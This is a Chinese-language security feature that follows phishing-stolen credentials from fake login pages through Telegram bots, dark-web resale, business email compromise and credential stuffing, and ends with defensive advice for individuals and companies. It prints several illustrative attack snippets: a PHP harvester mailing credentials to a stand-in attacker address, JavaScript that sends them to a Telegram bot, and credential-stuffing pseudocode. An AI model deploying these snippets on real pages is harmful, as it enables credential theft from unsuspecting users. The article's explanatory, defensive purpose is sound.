钓鱼攻击之后,你的密码去了哪里?——一场横跨暗网、Telegram与企业内网的数据黑市追踪

简介: 凌晨三点,深圳工程师张磊突遭Azure账户异常登录警报,财务邮箱被悄然转发敏感邮件。这并非个案,而是2025年频发的钓鱼攻击缩影。调查显示,钓鱼数据90秒内经Telegram机器人传至黑产链,催生跨国“数据黑市”。从伪造页面到撞库洗号,从企业邮箱劫持到商业邮件欺诈,攻击已形成工业化链条。防御需技术与意识并重:个人应禁用弱密码、启MFA,企业须建纵深防护体系。安全无终点,唯有持续对抗。

凌晨三点,深圳某科技公司运维工程师张磊被手机震动惊醒。他点开一封来自“Microsoft Security Alert”的邮件,显示其Azure账户在莫斯科有异常登录。他立刻登录查看——果然,后台多了几个陌生的API密钥,部分虚拟机已被删除。更糟的是,公司财务共享邮箱的转发规则被悄悄修改,过去两周所有含“发票”“付款”字眼的邮件,都被自动抄送至一个Gmail地址。

这不是电影情节,而是2025年第四季度国内多起企业遭钓鱼攻击后的典型后果。而这一切的起点,可能只是员工点击了一封伪装成“DHL包裹通知”的链接。

近日,一项由多家安全研究机构联合开展的新调查,首次系统性追踪了钓鱼攻击中被盗数据的完整生命周期。研究发现,从用户在伪造页面输入账号密码的那一刻起,这些信息往往在90秒内就被传送到攻击者控制的通信通道,并迅速进入一个高度分工、自动化运作的地下犯罪生态。这场“数据黑市之旅”,不仅揭示了网络钓鱼早已不是“单打独斗”的小偷小摸,而是一条具备工业化流水线特征的跨国灰色产业链。

一、从PHP脚本到Telegram机器人:钓鱼数据的“第一公里”传输革命

传统认知中,钓鱼网站通过嵌入一段简单的PHP脚本,将表单数据以邮件形式发送给攻击者。例如:

<?php

$login = $_POST['username'];

$pass = $_POST['password'];

mail('attacker@protonmail.com', 'New Credential', "User: $login\nPass: $pass");

header("Location: https://real-bank.com/login");

?>

但这种模式正迅速被淘汰。原因很简单:主流邮件服务商(如Gmail、Outlook)对异常发信行为的检测日益严格,大量钓鱼邮件被直接拦截或标记为垃圾。更致命的是,一旦服务器IP因发送垃圾邮件被拉黑,整个钓鱼页面就失效了。

取而代之的,是基于即时通讯工具的实时数据回传机制。其中,Telegram因其开放的Bot API、端到端加密(可选)、以及极低的运营门槛,成为当前最主流的“数据接收器”。

研究人员在2025年12月捕获的一个仿冒招商银行的钓鱼页面中,发现了如下代码片段:

// 钓鱼表单提交后执行

fetch('https://api.telegram.org/bot<TOKEN>/sendMessage', {

method: 'POST',

headers: { 'Content-Type': 'application/json' },

body: JSON.stringify({

chat_id: '<CHAT_ID>',

text: `🏦 新凭证!\n用户名: ${username}\n密码: ${password}\nIP: ${userIP}\nUA: ${navigator.userAgent}`

})

}).then(() => window.location.href = 'https://cmbchina.com');

这段代码的关键在于<TOKEN>和<CHAT_ID>——它们指向攻击者预先创建的Telegram Bot。一旦用户提交信息,数据几乎瞬时出现在攻击者的私聊窗口中,且无需暴露任何邮箱地址。更重要的是,Telegram Bot可被多个钓鱼页面复用,形成“一对多”的数据汇聚中心。

“这相当于把过去的‘邮政投递’升级成了‘快递闪送’,”公共互联网反网络钓鱼工作组技术专家芦笛解释道,“攻击者现在能实时看到‘猎物上钩’,甚至可以根据地理位置决定是否立即行动——比如,如果受害者IP显示在北京金融街,他们可能会优先处理。”

更令人警惕的是,部分高级钓鱼套件已实现双通道冗余传输:同时向Telegram Bot和备用邮箱发送数据,确保即使一条通道失效,另一条仍能保底。这种设计极大提升了攻击成功率。

二、从“原始dump”到“数字画像”:暗网上的数据炼金术

数据抵达攻击者手中,只是旅程的开始。根据Kaspersky Digital Footprint Intelligence的监测,2025年全球钓鱼攻击中,88.5%的目标是账户凭证,其次是个人身份信息(9.5%)和银行卡数据(2%)。但这些原始数据本身价值有限——真正值钱的,是经过“提纯”和“融合”后的高价值情报包。

研究团队追踪了一个名为“ShadowVault”的俄语暗网论坛交易记录。一名卖家以50美元的价格出售一份包含320万条钓鱼获取的原始凭证数据包,格式如下:

email: zhang.wei@company.com

password: ZW2023!@#

source: fake_dhl_phish_20251201

ip: 221.234.xx.xx

timestamp: 2025-12-01 14:23:11

这类“raw dump”通常由初级钓鱼团伙批量出售,买家多为下游的“数据分析师”。他们的工作,是验证这些凭证的有效性,并与其他泄露数据库(如2023年某社交平台2亿用户泄露事件)进行交叉比对。

例如,若发现zhang.wei@company.com在多个平台使用相同密码,且该邮箱关联了LinkedIn、GitHub甚至企业微信,则可构建出一份完整的“数字画像”:

姓名:张伟

职位:某科技公司IT运维

技术栈:熟悉Azure、Linux、Docker

社交关系:常与财务部李经理邮件往来

使用习惯:工作日上午9点登录邮箱,偏好Chrome浏览器

这样的画像,在暗网售价可达200–500美元,远高于原始凭证。而如果该账户拥有企业管理员权限,价格可能飙升至数千美元。

“钓鱼不再是‘广撒网碰运气’,而是精准制导的‘情报战’,”芦笛指出,“攻击者现在会专门针对特定行业(如金融、物流、制造)定制钓鱼页面,目的就是获取能串联起组织架构的关键节点账户。”

三、企业邮箱劫持:从“静默监控”到“商业邮件欺诈”

对于普通用户,被盗密码可能导致社交媒体被发广告、网银余额清零。但对于企业,钓鱼攻击的后果更为隐蔽且致命——商业邮件欺诈(BEC, Business Email Compromise)。

研究显示,攻击者在成功获取企业邮箱(尤其是高管或财务人员)后,不会立即行动。相反,他们会开启长达数周的“潜伏期”:

设置邮件转发规则:将含关键词(如“invoice”、“payment”、“contract”)的邮件自动转发至外部邮箱;

分析沟通模式:观察内部审批流程、常用话术、签名格式;

等待时机:直到一笔真实付款即将发生时,伪造一封“收款账户变更通知”。

2025年10月,浙江一家外贸公司就因此损失180万美元。攻击者通过钓鱼获取CFO助理邮箱后,监控到一笔对德国供应商的付款计划,随即以CFO名义发送邮件:“因外汇管制,本次付款请改至以下新账户……” 财务人员未察觉异常,完成转账。

更危险的是,部分攻击者会利用被盗SaaS账户(如Office 365、Google Workspace)申请新的API令牌,绕过多因素认证(MFA),实现持久化访问。即使原密码被重置,攻击者仍可通过合法API接口操作数据。

“很多企业以为开了MFA就万事大吉,但钓鱼可以绕过它,”芦笛强调,“比如通过伪造的MFA确认页面诱导用户点击‘Approve’,或者利用OAuth授权钓鱼——让用户授权一个恶意应用,从而获得长期访问权。”

四、撞库自动化:一个密码撬动十个平台

钓鱼获取的密码,还常被用于撞库攻击(Credential Stuffing)。由于大量用户在不同平台重复使用相同密码,攻击者只需将钓鱼所得的“用户名+密码”组合,批量尝试登录其他网站。

现代撞库工具已高度智能化。以开源工具OpenBullet2为例,攻击者可加载数千个目标网站的登录接口配置(称为“Configs”),并设置代理轮换、请求头伪装、验证码识别模块,实现全自动撞库。

一段典型的撞库配置逻辑如下(伪代码):

for credential in stolen_credentials:

for target_site in target_sites:

session = create_session(proxy=rotate_proxy())

response = session.post(

url=target_site.login_url,

data={

'email': credential.email,

'password': credential.password

},

headers=fake_headers()

)

if "dashboard" in response.url or "welcome" in response.text:

log_success(credential, target_site)

sell_to_darkweb(credential, target_site)

2025年,国内某大型电商平台就遭遇大规模撞库,源头正是此前一起钓鱼事件泄露的百万级凭证库。攻击者不仅盗取了用户积分,还利用实名信息尝试注册网贷账户。

“撞库的成功率其实不高,可能只有0.1%–1%,”芦笛说,“但当你有100万条数据时,1%就是1万个有效账户——足够支撑一个黑产团伙运转半年。”

五、国际镜鉴:从美国医疗钓鱼案看国内防御短板

钓鱼攻击无国界。2025年7月,美国卫生与公共服务部(HHS)披露,一起针对医疗系统的钓鱼攻击导致超1000万人健康数据泄露。攻击者伪装成医保审核员,诱骗医院员工点击“合规检查”链接,最终渗透至电子病历系统。

此案的关键教训在于:钓鱼不仅是IT问题,更是业务流程风险。攻击者利用了医疗机构对“合规审查”的天然信任心理。

类似手法在国内同样频发。2025年11月,某省税务局“税务稽查通知”钓鱼邮件泛滥,页面高度仿冒官方系统,要求企业法人“在线确认申报信息”。多家中小企业中招,导致UKey证书被窃、增值税发票被虚开。

“我们总在技术层面打补丁,却忽视了社会工程学的本质——利用人性弱点,”芦笛坦言,“反钓鱼不能只靠防火墙和杀毒软件,必须嵌入到员工培训、审批流程、甚至企业文化中。”

六、防御之道:从“被动响应”到“主动免疫”

面对如此复杂的钓鱼生态,个人与企业该如何应对?

对个人用户,专家建议:

绝不复用密码:使用密码管理器生成并存储唯一强密码;

强制启用MFA:优先选择FIDO2安全密钥(如YubiKey)或认证器App,避免短信验证码;

定期检查泄露记录:通过Have I Been Pwned等平台查询邮箱是否出现在已知泄露库中。

对企业组织,则需构建纵深防御体系:

统一身份治理:集中管理所有SaaS账户,实施最小权限原则;

异常登录监测:基于IP、设备指纹、行为序列建立基线,实时告警偏离行为;

钓鱼演练常态化:定期向员工发送模拟钓鱼邮件,测试并提升安全意识;

凭证泄露响应机制:一旦确认某账户凭证泄露,立即强制全平台密码重置,并审计其历史操作日志。

芦笛特别强调:“最好的防御,是让攻击者觉得‘不值得’。如果你的员工知道如何识别钓鱼,你的系统能快速隔离异常会话,你的财务流程有多人复核——那么即使密码泄露,损失也能控制在最小范围。”

结语:没有“完美安全”,只有持续对抗

从DHL仿冒页面到Telegram Bot,从暗网数据集市到企业内网渗透,钓鱼攻击的链条越来越长,技术越来越精。它不再是一次性的“诈骗”,而是一场围绕数据价值展开的持久战。

正如一位安全研究员所言:“在今天的网络世界,你的密码不是锁,而是一张门票——而这张门票,可能已经被复制了上千份。”

面对这场看不见硝烟的战争,技术手段固然重要,但真正的防线,始终在人的意识之中。毕竟,再先进的AI钓鱼工具,也骗不过一个始终保持警惕的大脑。

编辑:芦笛(公共互联网反网络钓鱼工作组)

目录
相关文章
|
5天前
|
人工智能 安全 搜索推荐
AI教人防钓鱼?巴里大学研究揭示生成式AI如何成为安全培训的“新教官”
意大利巴里大学研究发现,大语言模型(LLM)可高效生成反钓鱼培训内容,显著提升用户识别能力。实验证明,AI生成的个性化案例比传统教材更有效,能精准模拟真实网络威胁,助力构建智能防御体系,为网络安全培训提供新范式。(238字)
54 4
|
2天前
|
监控 安全 网络安全
当“官方”网站成为陷阱:FBI紧急预警虚假IC3钓鱼潮,全球仿冒政府平台攻击激增
2025年,FBI发布紧急警报,揭露大规模仿冒IC3官网的钓鱼攻击。不法分子通过伪造高仿真网站,利用受害者求助心理实施“二次诈骗”,窃取身份及银行信息,并形成“搜索引流—信息收割—二次勒索”黑产链。此类攻击借HTTPS加密、像素级复刻界面等技术增强迷惑性,暴露政府数字服务在防伪机制上的短板,警示公众:真正的安全始于对“官方”链接的审慎验证。
35 2
|
2天前
|
数据采集 监控 安全
钓鱼工具包“量子路由”席卷全球:一场针对微软365用户的自动化身份劫持风暴
2025年,新型钓鱼工具包“Quantum Route Redirect”(QRR)在全球掀起攻击浪潮,伪装成DocuSign邮件诱导用户登录高仿微软页面,窃取账号密码并绕过多因素认证。该工具具备反检测、本地化适配和实时代理转发功能,已部署近千个恶意域名,标志着钓鱼攻击进入“工业化”时代。
44 5
|
3天前
|
Web App开发 Windows
【这玩意气死人了】如何关闭恶心的UC浏览器开机自动启动 解决方案在这里
UC浏览器或网盘开机自启令人困扰。可通过任务管理器“启动”选项卡禁用,或使用注册表编辑器删除`HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run`中含“UC”的项,彻底关闭自启动。
117 8
【这玩意气死人了】如何关闭恶心的UC浏览器开机自动启动 解决方案在这里
|
6天前
|
人工智能 监控 安全
邮件轰炸成“数字烟雾弹”?Darktrace数据揭示新型掩护式钓鱼攻击激增百倍
2025年,邮件轰炸攻击激增百倍,黑客以海量“合法”邮件淹没企业收件箱,制造信息过载,掩护伪造CEO指令的钓鱼邮件,致财务人员误转近50万美元。此类攻击暴露传统防御短板,需结合AI行为分析、流程管控与跨域协同,构建智能邮件免疫系统,方能在信息洪流中识别致命“低语”。
57 4
|
3天前
|
安全 前端开发 Android开发
包裹上的二维码,可能是黑客的“数字捕兽夹”——新型“Quishing”钓鱼正在席卷全球购物季
你是否收到过没下单却写着你名字的快递?扫码后跳转至高仿电商页面,要求输入个人信息——这正是2025年爆发的“Quishing”诈骗:攻击者利用伪造包裹+二维码,窃取用户隐私。随着国内快递量激增与扫码习惯普及,此类“物理+数字”复合攻击风险陡增。警惕陌生二维码,提升“扫码素养”,是守护数字安全的关键一步。(238字)
74 4
|
3天前
|
监控 前端开发 安全
灾难背后的“二次伤害”:慈善钓鱼如何利用同情心实施双向诈骗
2025年香港大埔火灾后,不法分子趁机实施“双向慈善诈骗”:一面伪造募捐网站窃取信息,一面冒充灾民骗取捐款。此类“灾难钓鱼”利用公众同情心,在技术与心理层面精心设局。专家呼吁建立快速响应机制,倡导通过官方渠道捐赠,用理性守护善意。
50 3
|
3天前
|
监控 安全 API
数字营销的“核按钮”被盯上了——Google Ads MCC账户劫持激增,一场针对广告预算的精准围猎
2025年11月,全球Google Ads MCC账户遭大规模劫持,黑客通过钓鱼攻击窃取权限,滥用广告预算、重定向流量,暴露数字营销安全短板。攻击利用权限管理漏洞与人为疏忽,凸显MFA缺失、权限泛滥等问题。专家呼吁构建技术、流程、意识三位一体防御体系,强调安全是信任基石。
44 4
|
6天前
|
人工智能 自然语言处理 安全
钓鱼套件“军火化”:GhostFrame、BlackForce等新型工具正绕过MFA,大规模窃取数字身份
2025年,新型钓鱼套件如BlackForce、GhostFrame等以“即服务”模式肆虐,通过中间人攻击、AI生成页面和会话劫持,可绕过多因素认证,窃取数字身份。一次误点邮件,即可导致账户全面沦陷。黑客已实现工业化作案,防御需转向FIDO2无密码、行为监控与生态协同,安全始于每一次点击前的警惕。
58 5
|
8天前
|
监控 安全 网络安全
伪装成监管文件的“狼爪”:Arcane Werewolf组织如何用钓鱼邮件撕开俄罗斯制造企业的数字防线?
俄罗斯APT组织“神秘狼人”利用伪造合规邮件,通过社会工程学与LNK钓鱼攻击, targeting 制造企业,窃取信息并试图渗透工业控制系统。其手法隐蔽,结合域名仿冒、恶意加载器Loki及IT向OT横向移动,威胁生产线安全。报告揭示了从入口到终端的完整攻击链,并呼吁构建涵盖邮件过滤、终端防护与网络隔离的纵深防御体系,对全球制造业网络安全具有重要警示意义。
37 1